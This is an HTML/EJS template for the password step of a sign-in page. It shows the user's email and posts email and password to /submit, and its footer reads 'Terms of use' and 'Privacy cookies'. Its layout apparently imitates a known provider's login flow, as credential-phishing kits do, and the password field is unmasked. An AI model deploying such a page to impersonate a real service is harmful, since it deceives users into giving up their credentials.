<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Document</title>
  <link rel="stylesheet" href="index.css">
</head>
<body class="body">
  <div class="main">
   
    <div class="form">
      <div class="formwhole">

      <img class="image" src="./assets/10001.svg" alt="">
      <p class="para5"> <%= email %></p>
      <form action="/submit" method="post">
        
      <h2 class="head2">Enter Password</h2>
      <input type="hidden" name="email" value="<%= email %>">
      <input class="input" type="text" name="password" placeholder="Password" required>

      <p class="para1"> <a class="create-account-link" href="#">Forgot password?</a></p>
   
      <div class="buttons-container">
        <button class="button2" type="submit">Sign in</button>
        
      </div>
    </div>
    </div>
    </div>
  </div>
  <footer class="fot">
    <a class="item1" href="#">
      Terms of use </a>
        <a class="item2" href="#">Privacy  cookies</a>
        
  </footer>
</body>
</html>
